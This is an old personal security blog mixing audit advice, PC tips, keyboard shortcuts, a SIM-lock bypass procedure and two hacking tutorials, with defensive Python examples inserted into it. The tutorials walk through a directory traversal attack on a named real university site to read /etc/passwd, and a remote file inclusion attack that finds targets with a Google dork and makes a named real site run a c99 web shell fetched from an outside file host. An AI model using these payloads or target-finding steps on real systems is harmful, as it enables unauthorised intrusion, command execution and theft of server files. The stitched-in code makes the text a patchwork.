Thursday, 7 April 2011

The Benefits of Network Security Audit


Network security audit, also known as network security assessment, refers to the process of determining the security shortcomings on your network. The process is critical for a business because sensitive or critical information on a network cannot be adequately protected if you do not know what type of vulnerabilities or security holes exist on the network.


Security auditing and assessing of your network is not a one-time event. Security assessments should be ongoing because networks are constantly changing as new devices are added, configurations are changed, and software is updated. With any type of security assessment, the network layout must first be determined. The network security audit must accurately determine the extent or topology of your business network. This includes the type of devices, the operating system in use on the devices, and which updates have been applied. Also, you must determine what the critical information assets are and where they are located on the network.

Without this information, a network security audit is of little value because you cannot be sure to have completed a security assessment of the whole network or that you have evaluated the most critical components of the network where the most sensitive information is stored and accessed. Of course, there is much more to performing a network security audit, but these few elements are essential to make a proper evaluation of your corporate network's security.



Benefits of Network Security Audits

Network security audits help identify vulnerabilities on your network and network devices including:

  • Running services - Any service that is running on a network device can be used to attack a system. A solid network security audit would help you identify all services and turn off any unnecessary services.
  • Open ports - A network security audit will help you identify all open ports on network devices and, just like running services, all unneeded ports should be closed to eliminate the possibility of being used to attack a network device.
  • Open Shares - Any open share can be exploited and should not be used unless there is some essential business purpose for it.
  • Passwords - Assessments/audits should evaluate the enterprise password policy and ensure that the passwords used on the network devices meet the business password policy of password strength, frequent change, and other requirements.
  • User Accounts - During the audit, you must determine which user accounts are no longer being used so they can be removed or disabled. Unused user accounts allow for someone from inside or outside the network to attack and take over the account or may be an indication of a successful attack of the network.
  • Unapproved Devices - Unapproved or unknown devices such as iPods, Smart Phones and Wireless Access Points installed on your network must be detected in an audit. Any or all of these, as well as other devices, can be used to attack the network or steal data off the network.
  • Applications - The type of applications being used on a system should be identified during this process. If any dangerous applications are found running on a system, they should be removed. Also look for software programs that run automatically because they can be an indicator of a malware infection.

Security audits should be done on an ongoing basis. Without recurring security audits or assessments, new vulnerabilities may not be discovered and patched to keep the computer system secure. Also, such audits should not be done manually, because if administrators fail to apply certain scans, vulnerabilities in the operating systems or in installed applications can be exploited.

Using vulnerability scanners makes the task of security audits or assessments much easier and safer. These tools automate part of the process and allow administrators to analyze the results and determine which issues should be addressed first and in what priority the other security issues should be handled.

By identifying these types of vulnerabilities on an ongoing basis, you will be adding an extra layer of protection to your network. Because network security applications and services are constantly being updated, it is of great importance to apply one of the latest security scanners and use it on an ongoing basis, together with the expertise of knowledgeable security staff to evaluate the status of your network security.

Regards: Anshuman Kak a Script Kiddie

Thursday, 31 March 2011

Hack a website using Directory Traversal attack? (taking www.chitkara.edu.in)



What is the root directory of a web server?
It is a specific directory on the server in which the web contents are placed and can be seen by website visitors. Directories other than the root may contain sensitive data which the administrator does not want visitors to see. Everything accessible by a visitor on a website is placed in the root directory. The visitor cannot step out of the root directory.



What does ../ or ..\ (dot dot slash) mean?

The ..\ instructs the system to go one directory up. For example, suppose we are at the location C:\xx\yy\zz. On typing ..\ , we would arrive at C:\xx\yy.

Again on typing ..\ , we would reach C:\xx .

Let's go back to the location C:\xx\yy\zz. Now suppose we want to access a text file abc.txt placed in folder xx. We can type ..\..\abc.txt . Typing ..\ two times takes us two directories up (that is, to directory xx), where abc.txt is placed.

Note: It's ..\ on Windows and ../ on UNIX-like operating systems.



What is a Directory Traversal attack?

Directory Traversal is an HTTP exploit which allows attackers to access restricted directories and execute commands outside of the web server's root directory.

The goal of this attack is to access sensitive files placed on the web server by stepping out of the root directory using dot dot slash.

The following example will make everything clear.

Visit this website vulnerable to directory traversal attack












This web server is running on a UNIX-like operating system. There is a directory 'etc' on UNIX/Linux which contains configuration files of programs that run on the system. Some of the files are passwd, shadow, profile, sbin placed in the 'etc' directory.

The file etc/passwd contains the login names of users and even passwords too.

Let's try to access this file on the web server by stepping out of the root directory. Look carefully at the position of the directories placed on the web server.






We do not know the actual names and contents of the directories except 'etc', which is the default name, so I have marked them as A, B, C, E or whatever.

We are in directory F, accessing the web pages of the website.

Let's type this in the URL field and press Enter







This will search the directory 'etc' in F. But obviously, there is nothing like this in F, so it will return nothing



Now type



http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../etc/passwd



Now this will step up one directory (to directory E ) and look for 'etc' but again it will return nothing.



Now type







Now this will step up two directories (to directory D ) and look for 'etc' but again it will return nothing.



So by proceeding like this, we go for this URL







It takes us 5 directories up to the main drive and then to the 'etc' directory and shows us the contents of the 'passwd' file.



To understand the contents of 'passwd' file, visit http://www.cyberciti.biz/faq/understanding-etcpasswd-file-format






You can also view etc/profile, etc/services and many other files, like backup files, which may contain sensitive data. Some files like etc/shadow may not be accessible because they are accessible only by privileged users.

Note: If proc/self/environ is accessible, you might upload a shell on the server, which is called Local File Inclusion.
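
The server-side check that refuses the ../ requests walked through above, as an added example (not code from the original post or from the site it discusses): the unchecked join is shown beside a hardened resolver. The functions naive_resolve, safe_resolve and demo and the directory layout are hypothetical, and the tree is built in a temporary directory.

```python
import os
import tempfile


def naive_resolve(web_root, page):
    """The pattern behind the bug: join the parameter to the root, unchecked."""
    return os.path.normpath(os.path.join(web_root, page))


def safe_resolve(web_root, page):
    """Return the real path for `page` only if it is a file inside web_root."""
    root = os.path.realpath(web_root)
    if "\x00" in page or os.path.isabs(page):
        return None
    # realpath collapses every ../ and follows symlinks before the check.
    candidate = os.path.realpath(os.path.join(root, page))
    # commonpath compares whole components, so /srv/www-old is not mistaken
    # for a child of /srv/www as a plain startswith() test would allow.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate if os.path.isfile(candidate) else None


def demo():
    """Build a throwaway tree and compare both resolvers on sample requests."""
    results = {}
    with tempfile.TemporaryDirectory() as top:
        top = os.path.realpath(top)
        web_root = os.path.join(top, "site", "pages")   # plays directory F
        os.makedirs(web_root)
        os.makedirs(os.path.join(top, "etc"))
        outside = os.path.join(top, "etc", "passwd")    # constructed stand-in
        with open(outside, "w") as fh:
            fh.write("constructed sample, not a real passwd file\n")
        with open(os.path.join(web_root, "about.html"), "w") as fh:
            fh.write("<p>about</p>\n")
        # A symlink that lives inside the root but points outside it.
        os.symlink(outside, os.path.join(web_root, "link.html"))

        for page in ["about.html", "etc/passwd", "../etc/passwd",
                     "../../etc/passwd", "link.html", "/etc/passwd"]:
            naive = naive_resolve(web_root, page)
            naive_leaves_root = os.path.commonpath([web_root, naive]) != web_root
            served = safe_resolve(web_root, page) is not None
            results[page] = (naive_leaves_root, served)
    return results


if __name__ == "__main__":
    for page, (leaves, served) in demo().items():
        print(f"{page!r:22} naive leaves root: {leaves!s:5}  hardened serves: {served}")
```

The symlink case is the one a purely textual check misses: the naive path stays under the root, yet the file it names is outside, and only resolving the real path before comparing catches it.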

Regards:---- Anshuman kak a Script Kiddie.....

Wednesday, 30 March 2011

10 Fast and Free Security Enhancements

Before you spend a dime on security, there are many precautions you can take that will protect you against the most common threats.


1. Check Windows Update and Office Update regularly (http://office.microsoft.com/productupdates); have your Office CD ready. Windows Me, 2000, and XP users can configure automatic updates. Click on the Automatic Updates tab in the System control panel and choose the appropriate options.

2. Install a personal firewall. Both SyGate (http://www.sygate.com/) and ZoneAlarm (www.zonelabs.com) offer free versions.

3. Install a free spyware blocker. Our Editors' Choice ("Spyware," April 22) was SpyBot Search & Destroy (http://security.kolla.de/). SpyBot is also paranoid and ruthless in hunting out tracking cookies.


4. Block pop-up spam messages in Windows NT, 2000, or XP by disabling the Windows Messenger service (this is unrelated to the instant messaging program). Open Control Panel | Administrative Tools | Services and you'll see Messenger. Right-click and go to Properties. Set Start-up Type to Disabled and press the Stop button. Bye-bye, spam pop-ups! Any good firewall will also stop them.

5. Use strong passwords and change them periodically. Passwords should have at least seven characters; use letters and numbers and have at least one symbol. A decent example would be f8izKro@l. This will make it much harder for anyone to gain access to your accounts.

6. If you're using Outlook or Outlook Express, use the current version or one with the Outlook Security Update installed. The update and current versions patch numerous vulnerabilities.

7. Buy antivirus software and keep it up to date. If you're not willing to pay, try Grisoft AVG Free Edition (Grisoft Inc., http://www.grisoft.com/). And double-check your AV with the free, online-only scanners available at www.pandasoftware.com/activescan and http://housecall.trendmicro.com/.

8. If you have a wireless network, turn on the security features: Use MAC filtering, turn off SSID broadcast, and even use WEP with the biggest key you can get. For more, check out our wireless section or see the expanded coverage in Your Unwired World in our next issue.

9. Join a respectable e-mail security list, such as the one found at our own Security Supersite at http://security.ziffdavis.com/, so that you learn about emerging threats quickly and can take proper precautions.

10. Be skeptical of things on the Internet. Don't assume that e-mail "From:" a particular person is actually from that person until you have further reason to believe it's that person. Don't assume that an attachment is what it says it is. Don't give out your password to anyone, even if that person claims to be from "support."

Regards: Anshuman Kak a Script Kiddie

Monday, 28 March 2011

Best Way To Change Sim without code


Way to change SIM without code.

1 - Put your new SIM card inside the phone, but not totally plugged in (the phone doesn't see the SIM and boots without it)
2 - Put the battery on but leave a little space to push the SIM forward at the end
3 - Boot the phone; it will say 'no sim'
4 - Push the SIM in with something slim (e.g. a knife)
5 - Reset the phone with the hard reset code *2767*3855#

An additional step applies to the instructions above: when the phone prompts for a code, type 0000 first, optionally followed by the code of the SIM card.

That's it.
Don't let the phone turn off, or you will need to redo the same task again.

 Regards: Anshuman Kak a Script Kiddie

Thursday, 17 March 2011

How to Protect yourself from password Hacking?



Prevention is always better than cure. If you would like to take the risk, a common practice (for some of us) is to use another PC when we need to do something risky. With constant PC upgrades, many of us could easily keep an older PC (at least one) just for this purpose.

Use complex passwords and do not write them down anywhere. And use passwords on the internet only where SSL is enabled.





Use a password manager like KeePass Password Safe


 

Today you need to remember many passwords. You need a password for the Windows network logon, your e-mail account, your homepage's FTP password, online passwords (like a website member account), etc. The list is endless. Also, you should use different passwords for each account, because if you use only one password everywhere and someone gets this password, you have a problem... a serious problem. The thief would have access to your e-mail account, homepage, etc. Unimaginable.

KeePass

KeePass is a free open source password manager, which helps you to manage your passwords in a secure way. You can put all your passwords in one database, which is locked with one master key or a key file. So you only have to remember one single master password or select the key file to unlock the whole database. The databases are encrypted using the best and most secure encryption algorithms currently known (AES and Twofish).

After creating a password database, just drag and drop to use passwords. This software is portable and can also run from a pen drive.


Download URL: http://keepass.info/

Happy E- Hacking

Posted by: Anshuman Kak






Saturday, 12 March 2011

My Best Keyboard Shortcuts

Getting used to using your keyboard exclusively and leaving your mouse behind will make you much more efficient at performing any task on any Windows system. I use the following keyboard shortcuts every day:







Windows key + R = Run menu

This is usually followed by:
cmd = Command Prompt
iexplore + "web address" = Internet Explorer
compmgmt.msc = Computer Management
dhcpmgmt.msc = DHCP Management
dnsmgmt.msc = DNS Management
services.msc = Services
eventvwr = Event Viewer
dsa.msc = Active Directory Users and Computers
dssite.msc = Active Directory Sites and Services
Windows key + E = Explorer

ALT + Tab = Switch between windows

ALT, Space, X = Maximize window

CTRL + Shift + Esc = Task Manager

Windows key + Break = System properties

Windows key + F = Search

Windows key + D = Hide/Display all windows

CTRL + C = copy

CTRL + X = cut

CTRL + V = paste

Also don't forget about the "Right-click" key next to the right Windows key on your keyboard. Using the arrows and that key can get just about anything done once you've opened up any program.


Keyboard Shortcuts

[Alt] and [Esc] Switch between running applications

[Alt] and letter Select menu item by underlined letter

[Ctrl] and [Esc] Open Program Menu

[Ctrl] and [F4] Close active document or group windows (does not work with some applications)

[Alt] and [F4] Quit active application or close current window

[Alt] and [-] Open Control menu for active document

[Ctrl] and Left, Right arrow Move cursor forward or back one word

[Ctrl] and Up, Down arrow Move cursor forward or back one paragraph

[F1] Open Help for active application

Windows+M Minimize all open windows

Shift+Windows+M Undo minimize all open windows

Windows+F1 Open Windows Help

Windows+Tab Cycle through the Taskbar buttons

Windows+Break Open the System Properties dialog box



Accessibility shortcuts

Right SHIFT for eight seconds = Switch FilterKeys on and off.

Left ALT + left SHIFT + PRINT SCREEN = Switch High Contrast on and off.

Left ALT + left SHIFT + NUM LOCK = Switch MouseKeys on and off.

SHIFT five times = Switch StickyKeys on and off.

NUM LOCK for five seconds = Switch ToggleKeys on and off.

Explorer shortcuts

END = Display the bottom of the active window.

HOME = Display the top of the active window.

NUM LOCK + ASTERISK on numeric keypad (*) = Display all subfolders under the selected folder.

NUM LOCK + PLUS SIGN on numeric keypad (+) = Display the contents of the selected folder.

NUM LOCK + MINUS SIGN on numeric keypad (-) = Collapse the selected folder.

LEFT ARROW = Collapse current selection if it's expanded, or select parent folder.

RIGHT ARROW = Display current selection if it's collapsed, or select first subfolder.




Type the following commands in your Run Box (Windows Key + R) or Start Run

devmgmt.msc = Device Manager
msinfo32 = System Information
cleanmgr = Disk Cleanup
ntbackup = Backup or Restore Wizard (Windows Backup Utility)
mmc = Microsoft Management Console
excel = Microsoft Excel (If Installed)
msaccess = Microsoft Access (If Installed)
powerpnt = Microsoft PowerPoint (If Installed)
winword = Microsoft Word (If Installed)
frontpg = Microsoft FrontPage (If Installed)
notepad = Notepad
wordpad = WordPad
calc = Calculator
msmsgs = Windows Messenger
mspaint = Microsoft Paint
wmplayer = Windows Media Player
rstrui = System Restore
netscp6 = Netscape 6.x
netscp = Netscape 7.x
netscape = Netscape 4.x
waol = America Online
control = Opens the Control Panel
control printers = Opens the Printers Dialog


Internet browser

Type a word such as "google" in your address bar, then press [Right CTRL] and [Enter] to add www. and .com to the word and go to it.


For Windows XP:

Copy. CTRL+C
Cut. CTRL+X
Paste. CTRL+V
Undo. CTRL+Z
Delete. DELETE
Delete selected item permanently without placing the item in the Recycle Bin. SHIFT+DELETE
Copy selected item. CTRL while dragging an item
Create shortcut to selected item. CTRL+SHIFT while dragging an item
Rename selected item. F2
Move the insertion point to the beginning of the next word. CTRL+RIGHT ARROW
Move the insertion point to the beginning of the previous word. CTRL+LEFT ARROW
Move the insertion point to the beginning of the next paragraph. CTRL+DOWN ARROW
Move the insertion point to the beginning of the previous paragraph. CTRL+UP ARROW
Highlight a block of text. CTRL+SHIFT with any of the arrow keys
Select more than one item in a window or on the desktop, or select text within a document. SHIFT with any of the arrow keys
Select all. CTRL+A
Search for a file or folder. F3
View properties for the selected item. ALT+ENTER
Close the active item, or quit the active program. ALT+F4
Opens the shortcut menu for the active window. ALT+SPACEBAR
Close the active document in programs that allow you to have multiple documents open simultaneously. CTRL+F4
Switch between open items. ALT+TAB
Cycle through items in the order they were opened. ALT+ESC
Cycle through screen elements in a window or on the desktop. F6
Display the Address bar list in My Computer or Windows Explorer. F4
Display the shortcut menu for the selected item. SHIFT+F10
Display the System menu for the active window. ALT+SPACEBAR
Display the Start menu. CTRL+ESC
Display the corresponding menu. ALT+Underlined letter in a menu name
Carry out the corresponding command. Underlined letter in a command name on an open menu
Activate the menu bar in the active program. F10
Open the next menu to the right, or open a submenu. RIGHT ARROW
Open the next menu to the left, or close a submenu. LEFT ARROW
Refresh the active window. F5
View the folder one level up in My Computer or Windows Explorer. BACKSPACE
Cancel the current task. ESC
Prevent the CD from automatically playing. SHIFT when you insert a CD into the CD-ROM drive

Use these keyboard shortcuts for dialog boxes:

To Press
Move forward through tabs. CTRL+TAB
Move backward through tabs. CTRL+SHIFT+TAB
Move forward through options. TAB
Move backward through options. SHIFT+TAB
Carry out the corresponding command or select the corresponding option. ALT+Underlined letter
Carry out the command for the active option or button. ENTER
Select or clear the check box if the active option is a check box. SPACEBAR
Select a button if the active option is a group of option buttons. Arrow keys
Display Help. F1
Display the items in the active list. F4
Open a folder one level up if a folder is selected in the Save As or Open dialog box. BACKSPACE

If you have a Microsoft Natural Keyboard, or any other compatible keyboard that includes the Windows logo key and the Application key, you can use these keyboard shortcuts:


Display or hide the Start menu. WIN Key
Display the System Properties dialog box. WIN Key+BREAK
Show the desktop. WIN Key+D
Minimize all windows. WIN Key+M
Restores minimized windows. WIN Key+Shift+M
Open My Computer. WIN Key+E
Search for a file or folder. WIN Key+F
Search for computers. CTRL+WIN Key+F
Display Windows Help. WIN Key+F1
Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain. WIN Key+L
Open the Run dialog box. WIN Key+R
Open Utility Manager. WIN Key+U

Accessibility keyboard shortcuts:

Switch FilterKeys on and off. Right SHIFT for eight seconds
Switch High Contrast on and off. Left ALT+left SHIFT+PRINT SCREEN
Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK
Switch StickyKeys on and off. SHIFT five times
Switch ToggleKeys on and off. NUM LOCK for five seconds
Open Utility Manager. WIN Key+U

Shortcuts you can use with Windows Explorer:


Display the bottom of the active window. END
Display the top of the active window. HOME
Display all subfolders under the selected folder. NUM LOCK+ASTERISK on numeric keypad (*)
Display the contents of the selected folder. NUM LOCK+PLUS SIGN on numeric keypad (+)
Collapse the selected folder. NUM LOCK+MINUS SIGN on numeric keypad (-)
Collapse current selection if it's expanded, or select parent folder. LEFT ARROW
Display current selection if it's collapsed, or select first subfolder. RIGHT ARROW

Hacking Website Using Remote File Inclusion


Remote file inclusion is one of the most common vulnerabilities found in web applications. This type of vulnerability allows the hacker to add a remote file on the web server. If the attacker is successful in performing the attack, he/she will gain access to the web server and hence can execute any command on it.


 
Searching For Vulnerability:

A remote file inclusion vulnerability usually occurs in sites which have navigation similar to the one below:



www.Targetsite.com/index.php?page=Anything


To find the vulnerability the hacker will most commonly use the following Google Dork

"inurl:index.php?page="

This will show all the pages which have "index.php?page=" in their URL. Now, to test whether the website is vulnerable to remote file inclusion or not, the hacker uses the following command

www.targetsite.com/index.php?page=www.google.com

Let's target a website, i.e. http://www.cbspk.com/





So the hacker will put following in url given below:





If, after executing the command, the Google homepage shows up, then the website is vulnerable to this attack; if it does not come up, then you should look for a new target. In my case, after executing the above command in the address bar, the Google homepage shows up, indicating that the website is vulnerable to this attack.
Now the hacker would upload the shells to gain access. The most common shells used are the c99 shell or r57 shell. I would use the c99 shell. You can download the c99 shell from the link below:


The hacker would first upload the shells to a webhosting site such as ripway.com, 110mb.com etc.

Now here is how a hacker would execute the shells to gain access. Let's say, e.g., that the URL of the shell is

http://h1.ripway.com/Anshumankak/c99.txt

Now here is how a hacker would execute the following command to gain access

http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/Anshumankak/c99.txt?

Remember: At the end of url or else the shell will not execute. Now the hacker is inside the website and he could do anything with it.....
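
From the defender's side, the page= requests described in this post and in the directory traversal post above leave a recognisable trace in the web server's access log. This added example (not part of the original post) scans constructed Combined Log Format lines for them; the host names, the remote.txt file and the function names are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Request portion of a Combined Log Format line.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})\b'
)
# A value that starts with scheme:// names a remote resource, not a local page.
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]*://', re.I)

# Constructed sample lines (documentation IP ranges, example domains).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Mar/2011:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120',
    '198.51.100.7 - - [30/Mar/2011:10:02:11 +0000] "GET /index.php?page=http://files.example.net/remote.txt? HTTP/1.1" 200 48213',
    '198.51.100.7 - - [30/Mar/2011:10:02:40 +0000] "GET /index.php?page=../../etc/passwd HTTP/1.1" 200 1873',
    '203.0.113.5 - - [30/Mar/2011:10:03:00 +0000] "GET /index.php?page=http://files.example.net/remote.txt HTTP/1.1" 404 210',
    '192.0.2.10 - - [30/Mar/2011:10:04:00 +0000] "GET /search.php?q=http://example.org HTTP/1.1" 200 900',
]


def classify_value(value):
    """Label a decoded parameter value, or return None if it looks ordinary."""
    if SCHEME_RE.match(value):
        return "remote-include"
    # Split on both separators so ..\ and ../ are treated alike.
    if ".." in re.split(r'[\\/]', value):
        return "traversal"
    return None


def scan(lines, param="page"):
    """Return one finding per suspicious `param` value in the log lines."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        query = urlsplit(m["target"]).query
        # parse_qs percent-decodes values, so the check sees what the app sees.
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            kind = classify_value(value)
            if kind is None:
                continue
            status = int(m["status"])
            findings.append({
                "line": lineno,
                "ip": m["ip"],
                "kind": kind,
                "value": value,
                # A 2xx answer means the server did not refuse the request.
                "priority": "high" if 200 <= status < 300 else "low",
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

Only the named parameter is inspected, so the last sample line, a search query that legitimately contains a URL, is not reported.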


Regards Anshuman kak a Script Kiddie....